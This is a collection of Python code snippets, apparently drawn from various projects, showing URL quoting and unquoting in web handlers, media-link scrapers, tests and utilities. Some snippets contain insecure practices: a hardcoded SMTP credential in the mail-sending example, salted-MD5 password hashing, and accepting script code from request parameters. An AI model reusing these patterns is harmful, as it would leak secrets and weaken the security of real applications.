Example #1
    def get(self, *args):        
        logging.debug('RootHandler:GET')
        variables = {}
        query = Project.all()
        query.order('-date_updated')
        projects = query.fetch(12)
        
        user = self.get_current_user()
        variables.update({'user':user})
        variables.update({'logout':users.create_logout_url(self.request.uri)})
        variables.update({'login': users.create_login_url(self.request.uri)})
        variables.update({'controller':self})
        
        variables.update({'projects':projects})
        logging.info('GET index.html -- ')
        
        message=self.get_argument('m',None)
        if message:
            message=urllib2.unquote(message)
            variables.update({'msg': message})
            
        err_msg=self.get_argument('e',None)
        if err_msg:
            err_msg=urllib2.unquote(err_msg)
            variables.update({'err_msg': err_msg})

        content = self.render_template('index.html', variables)
        self.write(content)
Example #2
    def _cleanstr(self, str):
        str = str.strip()
        if str.find("function") == 0:
            pattern = (r"=\"([^\"]+).*}\s*\((\d+)\)")
            args = re.search(pattern, str, re.DOTALL)
            if args:
                a = args.groups()

                def openload_re(match):
                    c = match.group(0)
                    b = ord(c) + int(a[1])
                    return chr(b if (90 if c <= "Z" else 122) >= b else b - 26)

                str = re.sub(r"[a-zA-Z]", openload_re, a[0])
                str = urllib2.unquote(str)

        elif str.find("decodeURIComponent") == 0:
            str = re.sub(r"(^decodeURIComponent\s*\(\s*('|\"))|(('|\")\s*\)$)", "", str)
            str = urllib2.unquote(str)
        elif str.find("\"") == 0:
            str = re.sub(r"(^\")|(\"$)|(\".*?\")", "", str)
        elif str.find("'") == 0:
            str = re.sub(r"(^')|('$)|('.*?')", "", str)

        return str
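
The inner openload_re closure is a Caesar-style rotation: each ASCII letter is shifted by the captured number, wrapping around inside A-Z or a-z. A standalone sketch (the shift value and input string are made up, not from the original):

import re

shift = 3
def rotate(match):
    c = match.group(0)
    b = ord(c) + shift
    # wrap within 'A'-'Z' or 'a'-'z'
    return chr(b if (90 if c <= "Z" else 122) >= b else b - 26)

print re.sub(r"[a-zA-Z]", rotate, "xyz Abc")   # -> 'abc Def'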
Example #3
def _is_fetching_self(url, method):
  """Checks if the fetch is for the same URL from which it originated.

  Args:
    url: str, The URL being fetched.
    method: value from _VALID_METHODS.

  Returns:
    boolean indicating whether or not it seems that the app is trying to fetch
      itself.
  """
  if (method != GET or
      "HTTP_HOST" not in os.environ or
      "PATH_INFO" not in os.environ):
    return False

  scheme, host_port, path, query, fragment = urlparse.urlsplit(url)

  if host_port == os.environ['HTTP_HOST']:
    current_path = urllib2.unquote(os.environ['PATH_INFO'])
    desired_path = urllib2.unquote(path)

    if (current_path == desired_path or
        (current_path in ('', '/') and desired_path in ('', '/'))):
      return True

  return False
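
A minimal sketch (not from the original module; the URL and environment values are made up) of the comparison this check relies on: both PATH_INFO and the target path go through urllib2.unquote before being compared, so an encoded and a literal spelling of the same path count as the same resource.

import urllib2, urlparse

url = "http://app.example.com/tasks%20list"            # hypothetical fetch target
scheme, host_port, path, query, fragment = urlparse.urlsplit(url)
current_path = urllib2.unquote("/tasks list")           # as it might appear in PATH_INFO
print current_path == urllib2.unquote(path)             # True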
Example #4
def convert_utf8_url_to_ascii(url):
    """
    taken from http://stackoverflow.com/questions/804336/best-way-to-convert-a-unicode-url-to-ascii-utf-8-percent-escaped-in-python
    """
    # turn the string into unicode
    if not isinstance(url, unicode):
        url = url.decode('utf8')

    # parse it
    parsed = urlparse.urlsplit(url)

    # divide the netloc further
    userpass, at, hostport = parsed.netloc.rpartition('@')
    user, colon1, pass_ = userpass.partition(':')
    host, colon2, port = hostport.partition(':')

    # encode each component
    scheme = parsed.scheme.encode('utf8')
    user = urllib2.quote(user.encode('utf8'))
    colon1 = colon1.encode('utf8')
    pass_ = urllib2.quote(pass_.encode('utf8'))
    at = at.encode('utf8')
    host = host.encode('idna')
    colon2 = colon2.encode('utf8')
    port = port.encode('utf8')
    # could be encoded slashes!
    path = '/'.join(urllib2.quote(urllib2.unquote(pce).encode('utf8'), '')
                    for pce in parsed.path.split('/'))
    query = urllib2.quote(urllib2.unquote(parsed.query).encode('utf8'), '=&?/')
    fragment = urllib2.quote(urllib2.unquote(parsed.fragment).encode('utf8'))

    # put it back together
    netloc = ''.join((user, colon1, pass_, at, host, colon2, port))
    return urlparse.urlunsplit((scheme, netloc, path, query, fragment))
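
A brief usage sketch (the URL is illustrative, not from the original post): because every path segment is unquoted and then re-quoted with an empty safe set, a percent-encoded slash inside a segment survives instead of becoming a path separator, while plain unsafe characters get escaped.

print convert_utf8_url_to_ascii(u"http://example.com/a%2Fb/c d")
# -> http://example.com/a%2Fb/c%20d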
Example #5
    def resolve_url(self, url, connection, arguments={}):
        handler = None
        args = []
        kwargs = {}

        # unable to check host at the moment, so just loop over all handlers
        for pattern, handlers in self.application.handlers:
            for spec in handlers:
                if issubclass(spec.handler_class, AiryHandler):
                    match = spec.regex.match(url)
                    if match:
                        if spec.regex.groups:
                            # None-safe wrapper around url_unescape to handle
                            # unmatched optional groups correctly
                            def unquote(s):
                                if s is None:
                                    return s
                                return escape.url_unescape(s, encoding=None)

                            # Pass matched groups to the handler.  Since
                            # match.groups() includes both named and unnamed groups,
                            # we want to use either groups or groupdict but not both.
                            # Note that args are passed as bytes so the handler can
                            # decide what encoding to use.
                            if spec.regex.groupindex:
                                kwargs = dict((k, unquote(v)) for (k, v) in match.groupdict().iteritems())
                            else:
                                args = [unquote(s) for s in match.groups()]
                        handler = spec.handler_class(self, connection, arguments, **spec.kwargs)
                        break

        return handler, args, kwargs
Example #6
    def get_media_url(self, host, media_id):
        try:
            url = self.get_url(host, media_id)
            html = self.net.http_GET(url).content
    
            err = re.compile('<p class="err">(.+?)<br>').findall(html)
            if err:
                raise Exception (str(err))
    
            data = {}
            r = re.findall(r'type="(?:hidden|submit)?" name="(.+?)"\s* value="?(.+?)">', html)
            for name, value in r:
                data[name] = value
                data.update({'down_direct':1})
            
            common.addon.show_countdown(45, title='Muchshare', text='Loading Video...')
            html = self.net.http_POST(url, data).content
            r = re.search("(?:.+var file_link = \'|.+\<a id=\"lnk_download\" href=\")(.+?)(?:\'|\"\>)", html).group(1)
            r = urllib2.unquote(r)
            return r

        except Exception, e:
            common.addon.log('**** Muchshare Error occured: %s' % e)
            common.addon.show_small_popup('Error', str(e), 5000, '')
            return self.unresolvable(code=0, msg=e)
Example #7
 def set_language(self):
     "Set the language"
     nextpage = request.params.get('next', None)
     if not nextpage:
         nextpage = request.headers.get('Referer', None)
     if not nextpage:
         nextpage = '/'
     if '://' in nextpage:
         from_url = urlparse(nextpage)
         nextpage = from_url[2]
     lang_code = request.params.get('language', None)
     if lang_code and check_language(lang_code):
         session['lang'] = lang_code
         session.save()
     params = []
     for param in request.params:
         if not param in ['language', 'amp']:
             value = request.params[param]
             if value:
                 if (param == 'came_from' and
                     '://' in urllib2.unquote(value)):
                     urlparts = urlparse(urllib2.unquote(value))
                     value = urlparts[2] or '/'
                 params.append('%s=%s' % (urllib2.quote(param),
                                         urllib2.quote(value)))
     if 'lc=1' not in params:
         params.append('lc=1')
     if params:
         nextpage = "%s?%s" % (nextpage, '&amp;'.join(params))
     redirect(nextpage)
Example #8
def egg_info_for_url(url):
    scheme, server, path, parameters, query, fragment = urlparse.urlparse(url)
    base = urllib2.unquote(path.split('/')[-1])
    if server=='sourceforge.net' and base=='download':    # XXX Yuck
        base = urllib2.unquote(path.split('/')[-2])
    if '#' in base: base, fragment = base.split('#',1)
    return base,fragment
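
A quick sketch of what this helper returns (URLs are made up): the unquoted last path segment plus the URL fragment, with SourceForge '/download' URLs falling back to the preceding segment.

print egg_info_for_url("http://example.com/dist/Foo-1.0.tar.gz#md5=abc123")
# -> ('Foo-1.0.tar.gz', 'md5=abc123')
print egg_info_for_url("http://sourceforge.net/projects/foo/files/Foo-1.0.zip/download")
# -> ('Foo-1.0.zip', '')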
Example #9
 def post(self):
   username = self.request.get('username')
   lua_script = urllib2.unquote(base64.b64decode(
       self.request.get('lua_script')))
   lua_aggregator = urllib2.unquote(base64.b64decode(
       self.request.get('lua_aggregator')))
   _AddLuaTask(self.request, username, lua_script, lua_aggregator)
Example #10
    def post(self):
        """
        @api {POST}      /image/  Insert an image
        @apiName         InsertImage
        @apiGroup        Insert
        @apiDescription  Insert an image.

        @apiParam   {String}  id    The student ID.
        @apiParam   {String}  url   The image URL or absolute local file path.

        @apiParamExample  {json}  Request-Example:
                          {"id": "001", "url": "http://example.com/image.jpg"}

        @apiSuccess {String}  success  ok

        @apiUse    RequestParsingErrors
        @apiError  409  Inserted image ID already exists.

        @apiVersion 1.0.0
        """
        try:
            id, url, data = self.read_request('id', 'url')

            _config()
            logging.info(urllib2.unquote(url))
            img = uploader.upload(urllib2.unquote(url))
            try:
                self.db.image.insert({'_id': img['public_id'], 'sid': id})
            except errors.DuplicateKeyError:
                self.send_error(409, message="image id already exists.")

            self.response['success'] = 'ok'
            self.write_response()
        except base.ErrorSentException:
            pass
Example #11
def main():
    if len(sys.argv) == 1:
        dom = parseString(urlopen(XML_URL, data=POST_BODY).read())
    elif len(sys.argv) == 2:
        filename = sys.argv[1]
        if not os.path.exists(filename):
            print "File not found"
            return 1
        dom = parse(filename)
    else:
        print "Invalid arguments."
        return 1
    
    data = unquote(dom.getElementsByTagName("data").pop().lastChild.toxml()).split(':')[1].split(',')
    
    for i in range(0, len(data), len(FIELDS)):
        t_fields = data[i:i+len(FIELDS)]
        d = dict(zip(FIELDS, t_fields))
        d['url'] = unquote(d['url'])
        d['flv_url'] = unquote(d['flv_url'])
        d['rtmp_url'] = unquote(d['rtmp_url'])
        
        print d['title'].replace('+', ' ')
        print d['url']
        print d['rtmp_url']
        print    
Example #12
 def saveContent(self, isPage=False, content=None, targeturl='http://www.example.com/dir/example.txt'):
     #example : we have a file http://example.com/dir/somefile.txt
     #rooturl = http://example.com/
     #url - rooturl = dir/somefile.txt
     pos = u'./'
     MIME = None
     if(content is None):
         try:
             content,code,MIME = self.http_get(targeturl)
         except:
             print "FAIL over 30 times , giving up"
             return "ERROR", targeturl
     elif(isPage is True):
         MIME = u'text/html'
     try:
         filename = self.get_filename(MIME,  urllib2.unquote(targeturl.encode('utf-8')).decode('utf-8'))
     except UnicodeEncodeError:
         splits = filename
     if(isPage):
         pos = os.path.join(pos, filename)
         self.filesdir = urllib2.unquote(filename.split('.')[0]) + u'_files'
         if(not os.path.exists(os.path.join(self.tmpdir, self.filesdir))):
             os.mkdir(os.path.join(self.tmpdir, self.filesdir))
     else:
         pos = os.path.join(os.path.join(pos, self.filesdir), filename)
     try:
         ofile = open(os.path.join(self.tmpdir, pos),'wb')
         ofile.write(content)
         ofile.close()
     except IOError:
         print "Unable to save " + targeturl
     return content, pos
Example #13
    def http_get(self, url):
            MIME = '*/*'
            unquoteurl = urllib2.unquote(url.encode('utf-8'))
            scheme,netloc,url,params,query,fragment = urlparse(unquoteurl)
            netloc = urllib2.quote(netloc)
            url = urllib2.quote(url)
            url = ParseResult( scheme,netloc,url,params,query,fragment ).geturl()
            retries = 30
            i = 0
            while(True):
                try:
                    if(self.useproxy):
                        print 'using proxy'
                        response = self.opener.open(url,timeout=5)
                        print("GET "  + urllib2.unquote(response.geturl().encode()) + " " + str(response.code))
                        if('content-type' in response.headers):
                            MIME = response.headers['content-type'].split(';')[0]
                        print response
                        return response.read(), response.code, MIME
                    else:
                        response = requests.get(url)
                        print("GET "  + urllib2.unquote(str(response.url)) + " " + str(response.status_code))
                        if('content-type' in response.headers):
                            MIME = response.headers['content-type'].split(';')[0]
                        return response.content, response.status_code, MIME
                except:
                    if(i > retries):
                        traceback.print_exc()
                        raise
                    print "timeout 5000ms"
                    i += 1
Example #14
def docs(docs=None, q=None):
    response.content_type = 'application/json; charset=UTF8'
    response.set_header('Expires', _cache_date())
    
    try:
        if request.query.q:
            q = unquote(request.query.q)
    except:
        pass

    try: 
        if request.query.id:
            docs = [unquote(request.query.id)]
    except:
        pass
    
    try: 
        response.set_header('Expires', 0)
        response.set_header('Pragma', 'no-cache')
        response.set_header('Cache-Control', 'no-cache, no-store, must-revalidate')
        if request.query.random:
            docs = [np.random.choice(lda_v.corpus.view_metadata(context_type)[doc_label_name(context_type)])]
    except:
        pass

    js = get_docs(docs, query=q)

    return json.dumps(js)
Example #15
def grab(secondary_url):
    global DEPTH
    global LIMIT_DEPTH

    if (secondary_url, DEPTH) in URLS:
        return True

    URLS.append((secondary_url, DEPTH))

    filename = urllib2.unquote(secondary_url.split('/')[-1])
    filename, isimg = fix_image(filename)

    if exist(filename):
        return True

    if isimg:
        get_wiki_image(secondary_url)
        return True

    if DEPTH > LIMIT_DEPTH:
        return True

    print '[%d]' % DEPTH, '--' * DEPTH, 'parsing...\t', urllib2.unquote(secondary_url)
    DEPTH += 1

    try:
        first_page = urllib2.urlopen(URL_BASE + secondary_url)
    except Exception, inst:
        print URL_BASE + urllib2.unquote(secondary_url), 'does not exist'
        return False
Example #16
    def read(self, input_file):
        """ Reads an InputHeader from `input_file`.

        The input header is read as a sequence of *<key>***:***<value>* pairs
        separated by a newline. The end of the input header is signalled by an
        empty line or an end-of-file.

        :param input_file: File-like object that supports iteration over lines

        """
        key, value = None, None
        for line in input_file:
            if line == '\n':
                break
            if line[-1:] == '\n':
                line = line[:-1]
            item = line.split(':', 1)
            if len(item) == 2:
                # start of a new item
                self._update(key, value)
                key, value = item[0], urllib.unquote(item[1])
            elif key is not None:
                # continuation of the current item
                value = '\n'.join([value, urllib.unquote(line)])

        self._update(key, value)
        return
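
For reference, a hedged sketch of the input this reader expects (the field names are made up): values are percent-decoded, a line without ':' is appended to the previous value, and a blank line or end-of-file ends the header.

sample = (
    "infoPath:/some%20path\n"       # -> key 'infoPath', value '/some path'
    "note:first%20line\n"
    "and a continuation line\n"     # joined to 'note' with a newline
    "\n"                            # blank line ends the header
)
# It could be fed to the reader with StringIO.StringIO(sample), since the
# method only needs an object that iterates over lines.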
Example #17
def getImage(url, h=None, w=None, o=100, auth=None, **kwargs):
    # Create the image directory if it doesn't exist
    imgdir = os.path.join(htpc.datadir, 'images/')
    if not os.path.exists(imgdir):
        os.makedirs(imgdir)

    fileName = unquote(unquote(url)).rsplit('/', 1).pop()
    imgName, imgType = fileName.rsplit('.', 1)

    original = resized = os.path.join(imgdir, imgType+'_'+imgName+'.png')
    if h and w:
        resized = os.path.join(imgdir, original+'_'+w+'_'+h+'.png')

    # If there is no local copy of the original
    if not os.path.isfile(original):
        original = downloadImage(url, original, auth)

    if not original:
        print "Error downloading image"
        raise cherrypy.NotFound(fileName)

    # If there is no local resized copy
    if not os.path.isfile(resized):
        resized = resizeImage(original, h, w, o, resized)

    if not resized:
        resized = original

    # Load file from disk
    return serve_file(path=resized, content_type='image/png')
Example #18
    def post(self):
        self.response.headers['Content-Type'] = 'application/json;charset=utf-8'
        account = urllib2.unquote(self.request.get('account')).encode('utf-8')
        contacts = urllib2.unquote(self.request.get('contacts')).encode('utf-8')
        accountInfo = json.loads(account)
        contactInfo = json.loads(contacts)

        username = accountInfo['email']
        access_token = accountInfo['access_token']

        g = Gmail()
        try:
            g.authenticate(username, access_token)

            context = {}
            for contact in contactInfo['contacts']:
                emails = None
                emails = g.sent().mail(to=contact)
                numEmails = len(emails)
                context[contact]=numEmails

            g.logout()
            self.response.out.write(json.dumps(context))

        except Exception, e:
            print "Authentication failure."
            print "Error:",str(e)
            return
Example #19
    def title(self):
        """Return a title for this annotation.

        Return the annotated document's title or if the document has no title
        then return its filename (if it's a file:// URI) or its URI for
        non-file URIs.

        The title is escaped and safe to be rendered.

        If it contains escaped characters then the title will be a
        Markup object, so that it won't be double-escaped.

        """
        document_ = self.annotation.document
        if document_:
            try:
                title = document_["title"]
            except (KeyError, TypeError):
                # Sometimes document_ has no "title" key or isn't a dict at
                # all.
                title = u""
            if title:
                # Convert non-string titles into strings.
                # We're assuming that title cannot be a byte string.
                title = unicode(title)

                return jinja2.escape(title)

        if self.filename:
            return jinja2.escape(urllib2.unquote(self.filename))
        else:
            return jinja2.escape(urllib2.unquote(self.uri))
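
A small illustration (the filename is made up) of why the fallback unquotes before escaping: percent-escapes in a file:// filename become readable, and the result is then HTML-escaped so it is safe to render.

import jinja2, urllib2

filename = "My%20Papers%2FDraft%20%3C2%3E.pdf"    # hypothetical self.filename value
print jinja2.escape(urllib2.unquote(filename))
# -> My Papers/Draft &lt;2&gt;.pdf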
Example #20
    def success(self):
        print self.msg
        self.process_map["FILE"] = "success.html"
        sender = self.msg["email"]
        receivers = ['*****@*****.**']
        subject = "[loframe_code]" + self.msg["name"]
        rawcode = self.msg["code"]
        text = urllib2.unquote(rawcode)
        text = urllib2.unquote(text)

        message = """From: %s\nTo: %s\nSubject: %s\n\n%s
            """ % (sender, ", ".join(receivers), subject, text)

        txt_confirm = "This is the email confirming you have successfully submitted your code."
        msg_rpy = """From: %s\nTo: %s\nSubject: %s\n\n%s
            """ % (sender, ", ".join(receivers), subject, txt_confirm)
        y_name = "*****@*****.**"
        y_pwd = "09df64ea8f402b4e56efeacb5b5b09c3"
        smtpserver = smtplib.SMTP("smtp.mailgun.org",587)
        smtpserver.ehlo()
        smtpserver.starttls()
        smtpserver.ehlo() 
        smtpserver.login(y_name, y_pwd)
        smtpserver.sendmail("*****@*****.**", receivers[0], message)
        smtpserver.sendmail("*****@*****.**", sender, msg_rpy)
        smtpserver.close()
Example #21
def getSimilarNotes():
    """
        Return a set of similar notes
        based on the input id and topN
    """
    if request.method == 'POST':
        # POST request
        id = urllib2.unquote(request.form['id'])  # fetch the note id from the request
        topN = urllib2.unquote(request.form["topn"])
    else:
        # GET request
        id = urllib2.unquote(request.args.get('id', ''))
        topN = urllib2.unquote(request.args.get('topn', ''))

    results = snotes.getSimilarItems(id, topN)

    response =  {}
    response["success"] = "true"
    response["num"] = len(results)
    response["notes"] = []
    for (resultId, sim) in results:
        note = snotes.getNote(resultId)
        temp = {}
        temp["id"] = resultId
        temp["similarity"] = sim
        temp["note"] = note
        response["notes"].append(temp)

    return json.dumps(response)
Example #22
 def _download(self, path, download_url):
     self.path = path
     
     d = curl()
     filename, download_html = d._curl(self.path)
     _number_pages = re.search('yui3-appsview-page-ellipsis">.*?</span>.*?<a  title="第(.+?)页"', download_html, re.DOTALL)
     try:
         os.makedirs('./Tinkerbell/downloads/m163')
     except OSError:
         pass
     os.chdir("./Tinkerbell/downloads/m163")
     for i in range(1, int(_number_pages.group(1))+1):
         self.download_url = download_url + str(i) + ".html"
         filename, download_html = d._curl(self.download_url)
         _log("Downloading from %s" % unquote(self.download_url))
         found = re.findall('m-t5">.*?<a href="(.+?)"', download_html, re.DOTALL)
         for _apk_link in found:
             filename = os.path.basename(_apk_link)
             filename = re.findall('%2Ffile.m.163.com%2Fapp%2Ffree%2F.*?%2F.*?%2F(.+?).apk', filename, re.DOTALL)
             if len(filename)!=0:
                 _download_name = repr(unquote(filename[0])).replace('\'','')
                 _download_name = _download_name.replace('u\\','').replace('\\','')
                 _download_name = _download_name.split('/', 1)[-1] + ".apk"
                 d._download_apk(_apk_link,_download_name)
     os.chdir('../../../')
Example #23
def loadVideos(url,name):
        #try:
           newlink=url
           print newlink
           xbmc.executebuiltin("XBMC.Notification(Please Wait!,Loading selected video)")
           if (newlink.find("dailymotion") > -1):
                match=re.compile('(dailymotion\.com\/(watch\?(.*&)?v=|(embed|v|user)\/))([^\?&"\'>]+)').findall(newlink)
                lastmatch = match[0][len(match[0])-1]
                link = 'http://www.dailymotion.com/'+str(lastmatch)
                req = urllib2.Request(link)
                req.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3')
                response = urllib2.urlopen(req)
                link=response.read()
                response.close()
                sequence=re.compile('"sequence",  "(.+?)"').findall(link)
                newseqeunce = urllib.unquote(sequence[0]).decode('utf8').replace('\\/','/')
                #print 'in dailymontion:' + str(newseqeunce)
                imgSrc=re.compile('"videoPreviewURL":"(.+?)"').findall(newseqeunce)
                if(len(imgSrc[0]) == 0):
                    imgSrc=re.compile('/jpeg" href="(.+?)"').findall(link)
                dm_low=re.compile('"sdURL":"(.+?)"').findall(newseqeunce)
                dm_high=re.compile('"hqURL":"(.+?)"').findall(newseqeunce)
                playVideo('dailymontion',urllib2.unquote(dm_low[0]).decode("utf8"))
           elif (newlink.find("docs.google.com") > -1):  
                vidcontent = GetContent(newlink)
                html = vidcontent.decode('utf8')
                stream_map = re.compile('fmt_stream_map","(.+?)"').findall(html)[0].replace("\/", "/")
                formatArray = stream_map.split(',')
                for formatContent in formatArray:
                     formatContentInfo = formatContent.split('|')
                     qual = formatContentInfo[0]
                     url = (formatContentInfo[1]).decode('unicode-escape')
                     playVideo("direct",url)
           elif (newlink.find("4shared") > -1):
                d = xbmcgui.Dialog()
                d.ok('Not Implemented','Sorry 4Shared links',' not implemented yet')		
           elif (newlink.find("vimeo") > -1):
                idmatch =re.compile("http://player.vimeo.com/video/([^\?&\"\'>]+)").findall(newlink)
                if(len(idmatch) > 0):
                        idmatch=idmatch[0].replace("'","")
                else:
                        idmatch =re.compile("//vimeo.com/(.+?)dk").findall(newlink+"dk")
                        idmatch=idmatch[0].replace("'","")
                playVideo('vimeo',idmatch)
           else:
                if (newlink.find("linksend.net") > -1):
                     d = xbmcgui.Dialog()
                     d.ok('Not Implemented','Sorry videos on linksend.net does not work','Site seem to not exist')		
                newlink1 = urllib2.unquote(newlink).decode("utf8")+'&dk;'
                print 'NEW url = '+ newlink1
                match=re.compile('(youtu\.be\/|youtube-nocookie\.com\/|youtube\.com\/(watch\?(.*&)?v=|(embed|v|user)\/))([^\?&"\'>]+)').findall(newlink1)
                if(len(match) == 0):
                    match=re.compile('http://www.youtube.com/watch\?v=(.+?)&dk;').findall(newlink1)
                if(len(match) > 0):
                    lastmatch = match[0][len(match[0])-1].replace('v/','')
                    #d = xbmcgui.Dialog()
                    #d.ok('mode 2',str(lastmatch),'launching yout')
                    playVideo('youtube',lastmatch)
                else:
                    playVideo('moviekhmer',urllib2.unquote(newlink).decode("utf8"))
Example #24
    def test_selection_for_survey_that_has_no_sampling(self):
        open_survey = Survey.objects.create(name="open survey", description="open survey", has_sampling=False)
        with patch.object(Survey, "currently_open_survey", return_value=open_survey):
            mobile_number = self.ussd_params['msisdn'].replace(COUNTRY_PHONE_CODE, '', 1)
            self.assertEquals(RandomHouseHoldSelection.objects.count(), 0)

            response_message = "responseString=%s&action=request" % HouseHoldSelection.MESSAGES['HOUSEHOLDS_COUNT_QUESTION']

            response = self.client.get('/ussd', data=self.ussd_params)
            self.failUnlessEqual(response.status_code, 200)
            self.assertEquals(urllib2.unquote(response.content), response_message)
            self.assertEquals(RandomHouseHoldSelection.objects.count(), 0)

            self.ussd_params['response'] = "true"
            self.ussd_params['ussdRequestString'] = " 100 "

            response_message = "responseString=%s&action=end" % HouseHoldSelection.MESSAGES[
                'HOUSEHOLD_CONFIRMATION_MESSAGE']
            response = self.client.get('/ussd', data=self.ussd_params)
            self.failUnlessEqual(response.status_code, 200)
            self.assertEquals(urllib2.unquote(response.content), response_message)
            self.assertEquals(RandomHouseHoldSelection.objects.count(), 1)

            household_selection = RandomHouseHoldSelection.objects.all()[0]
            self.assertEquals(household_selection.mobile_number, mobile_number)
            self.assertEquals(household_selection.no_of_households, 100)
            selected_households = household_selection.selected_households.split(',')
            self.assertEquals(len(selected_households), 100)

            message = BackendMessage.objects.filter(identity=self.ussd_params['msisdn'])
            self.failIf(message)
Example #25
def _get_video_link_dict(url):
	header = {'GData-Version' : '3.0' }
	req = urllib2.Request(url, None, header)
	try:
		response = urllib2.urlopen(req)
	except urllib2.URLError as e:
		if hasattr(e, 'reason'):
			raise RuntimeError(str(e.reason))
		elif hasattr(e, 'code'):
			raise RuntimeError(str(e.code))
	else:
		response_data = response.read()

	re_stream_map = re.compile(r'"url_encoded_fmt_stream_map": "(.+?)"')
	re_adaptive_fmts = re.compile(r'"adaptive_fmts": "(.+?)"')
	re_url = re.compile(r'url=(.+?)(?:,|\\)')
	re_itag = re.compile(r'itag=(\d+)')

	stream_map = re.search(re_stream_map, response_data).group(1)
	adaptive_fmts = re.search(re_adaptive_fmts, response_data).group(1)

	video_info = stream_map + adaptive_fmts
	
	urls = re.findall(re_url, video_info)

	url_dict = {}

	for u in urls:
		u = urllib2.unquote(urllib2.unquote(u))
		itag = re.search(re_itag, u).group(1)
		url_dict[str(itag)] = u
	
	return url_dict
Example #26
 def changepassword(self, fields):
     time.sleep(1)
     # fields is a URL-encoded body like "oldpassword=...&newpassword1=...&newpassword2=..."
     d={urllib2.unquote(i.split('=')[0]):urllib2.unquote(i.split('=')[1]) for i in [tmp for tmp in fields.split('&')]}
     oldpassword=d['oldpassword']
     newpassword1=d['newpassword1']
     newpassword2=d['newpassword2']
     user=checkPassword()
     if not user:
         return """You have been logged out.  <a href="/home/login">Log in</a>."""
     if oldpassword=='' or newpassword1=='' or newpassword2=='':
         return 'You need to fill in all the required password data'
     if newpassword1!=newpassword2:
         return "You entered your new password incorrectly.  Please try again."
     elif len(newpassword1)<=5:
         return "<p>Your password needs to be greater than 5 characters</p>" 
     oldpass=hashlib.md5((oldpassword+salt).encode('utf-8')).hexdigest()
     newpass=hashlib.md5((newpassword1+salt).encode('utf-8')).hexdigest()
     ## RESET COOKIE
     cookie = cherrypy.response.cookie
     sida=user
     sidb=newpass
     cookie['sida']=sida
     cookie['sida']['expires'] = 12 * 30 * 24 * 60 * 60
     cookie['sida']["path"] = "/"
     cookie['sidb']=sidb
     cookie['sidb']['expires'] = 12 * 30 * 24 * 60 * 60
     cookie['sidb']["path"] = "/"
     cherrypy.request.cookie=cookie
     
     data=db.execute("""SELECT id FROM lab_members WHERE name=%s AND password=%s""", (user,oldpass), commit=False)
     if len(data)==0:
         return "Your password is incorrect."
     db.execute('''UPDATE lab_members SET  password=%s WHERE name=%s''', (newpass, user))
     return 'Your password has been updated!'
Example #27
    def test_selection(self):
        with patch.object(Survey, "currently_open_survey", return_value=self.open_survey):
            self.assertEquals(RandomHouseHoldSelection.objects.count(), 0)

            response_message = "responseString=%s&action=request" % HouseHoldSelection.MESSAGES['HOUSEHOLDS_COUNT_QUESTION']
            response = self.client.get('/ussd', data=self.ussd_params)
            self.failUnlessEqual(response.status_code, 200)
            self.assertEquals(urllib2.unquote(response.content), response_message)
            self.assertEquals(RandomHouseHoldSelection.objects.count(), 0)

            self.ussd_params['response'] = "true"
            self.ussd_params['ussdRequestString'] = " 100 "

            response_message = "responseString=%s&action=end" % HouseHoldSelection.MESSAGES[
                'HOUSEHOLD_SELECTION_SMS_MESSAGE']
            response = self.client.get('/ussd', data=self.ussd_params)
            self.failUnlessEqual(response.status_code, 200)
            self.assertEquals(urllib2.unquote(response.content), response_message)
            self.assertEquals(RandomHouseHoldSelection.objects.count(), 1)

            household_selection = RandomHouseHoldSelection.objects.all()[0]
            mobile_number = self.ussd_params['msisdn'].replace(COUNTRY_PHONE_CODE, '', 1)
            self.assertEquals(household_selection.mobile_number, mobile_number)
            self.assertEquals(household_selection.no_of_households, 100)
            selected_households = household_selection.selected_households.split(',')
            self.assertEquals(len(selected_households), 10)

            message = BackendMessage.objects.get(identity=self.ussd_params['msisdn'])
            self.assertEquals(message.text, household_selection.text_message())
Example #28
    def test_with_one_batch_open(self):
        self.batch.open_for_location(self.location)

        self.assertEquals(HouseholdMemberBatchCompletion.objects.count(), 0)
        mock_filter = MagicMock()
        mock_filter.exists.return_value = True
        with patch.object(RandomHouseHoldSelection.objects, 'filter', return_value=mock_filter):
            with patch.object(USSDSurvey, 'is_active', return_value=False):
                self.reset_session()

                self.choose_menu_to_take_survey()
                self.select_household()
                response = self.select_household_member()
                response_string = "responseString=%s&action=request" % self.question_1.to_ussd()
                self.assertEquals(urllib2.unquote(response.content), response_string)

                response = self.respond("1")
                response_string = "responseString=%s&action=request" % self.question_2.to_ussd()
                self.assertEquals(urllib2.unquote(response.content), response_string)

                response = self.respond("1")
                response_string = "responseString=%s&action=request" % USSD.MESSAGES['HOUSEHOLD_COMPLETION_MESSAGE']
                self.assertEquals(urllib2.unquote(response.content), response_string)

                self.assertEquals(HouseholdMemberBatchCompletion.objects.count(), 1)
                household_completed = HouseholdMemberBatchCompletion.objects.latest('id')
                self.assertEquals(household_completed.household, self.household)
                self.assertEquals(household_completed.investigator, self.investigator)
                self.assertEquals(household_completed.batch, self.batch)
Example #29
def lambe(orgao_a, estado_a, orgao_b, estado_b, raw=False):
    orgao_a = unquote(orgao_a)
    estado_a = unquote(estado_a)
    orgao_b = unquote(orgao_b)
    estado_b = unquote(estado_b)

    l = {
        "a": {"estado": estado_a, "orgao": orgao_a, "valor": lambes[orgao_a][estado_a]},
        "b": {"estado": estado_b, "orgao": orgao_b, "valor": lambes[orgao_b][estado_b]},
    }

    if l["a"]["valor"] <= l["b"]["valor"]:
        l["proporcao"] = "menos"
        # hackish?
        l["razao"] = round((l["b"]["valor"] - l["a"]["valor"]) / l["a"]["valor"], 1)
        l["razao_g"] = round(l["b"]["valor"] / l["a"]["valor"], 1)
    else:
        l["proporcao"] = "mais"
        l["razao"] = round(l["a"]["valor"] / l["b"]["valor"], 1)
    image_path = unidecode("-".join([l["a"]["orgao"], l["a"]["estado"], l["b"]["orgao"], l["b"]["estado"]]))

    if os.path.isfile(here + "/static/raw/" + image_path + "-hi.png"):
        l["image"] = image_path
    else:
        if not raw:
            t = threading.Thread(target=generate_image, args=(l, 3))
            t.start()
    return render_template("lambe.html", l=l)
Example #30
def fixurl(url):
    # turn string into unicode
    if not isinstance(url,unicode):
        url = url.decode('utf8')

    # parse it
    parsed = urlparse.urlsplit(url)

    # divide the netloc further
    userpass,at,hostport = parsed.netloc.rpartition('@')
    user,colon1,pass_ = userpass.partition(':')
    host,colon2,port = hostport.partition(':')

    # encode each component
    scheme = parsed.scheme.encode('utf8')
    user = urllib2.quote(user.encode('utf8'))
